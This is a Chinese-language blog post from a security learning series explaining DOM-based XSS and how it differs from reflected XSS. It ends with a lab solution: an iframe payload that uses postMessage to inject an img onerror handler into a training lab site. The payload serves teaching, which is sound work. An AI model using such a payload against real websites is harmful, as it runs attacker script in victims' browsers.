iT邦幫忙

2023 iThome 鐵人賽

DAY 27
0

什麼是DOM?

文件物件模型(DOM)是網頁瀏覽器對頁面上元素的分層表示。 網站可以使用JavaScript來操縱DOM的節點與物件以及其屬性。

DOM-based XSS漏洞

原因:
網站沒有對使用者輸入進行適當的過濾和檢查,而直接將其使用在操作DOM的程式碼中。

特點:

  1. 沒有資料檢查: 沒有對使用者輸入進行適當的過濾和驗證,從而使惡意語句可以被插入到DOM中。
  2. 不通過伺服器: 與傳統的XSS攻擊不同,DOM型XSS攻擊的payload不會被發送到伺服器,而是直接在客戶端執行。
  3. 根據網站結構進行攻擊: 攻擊者通常需要根據特定的網站結構和應用邏輯來構造有效的payload。
  4. 前端操作需要謹慎: 使用如.html().innerHTML()這樣的前端API時需要特別小心,因為這些API容易引入XSS漏洞。

與反射型XSS的區別:
反射型XSS是當使用者點擊一個惡意鏈接時,惡意腳本被嵌入到URL中並隨著請求一起發送到伺服器,然後伺服器返回該腳本並執行它。而DOM型XSS是在不涉及伺服器的情況下,直接在客戶端執行惡意腳本。

Lab time

https://ithelp.ithome.com.tw/upload/images/20231012/20162491O8uiN0wztY.png

<iframe src="https://0a6f00d7045312c88095121200eb00ad.web-security-academy.net/" onload="this.contentWindow.postMessage('<img src=1 onerror=print()>','*')">

https://ithelp.ithome.com.tw/upload/images/20231012/20162491VrmGHRmp79.png
https://ithelp.ithome.com.tw/upload/images/20231012/20162491JbPrpkTdiv.png


上一篇
[Day 26]更多的 CSRF 漏洞
下一篇
[Day 28]資訊洩漏
系列文
從 Moblie Development 主題被損友洗腦鬼轉 Security 的我真的可以完賽嗎?30
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言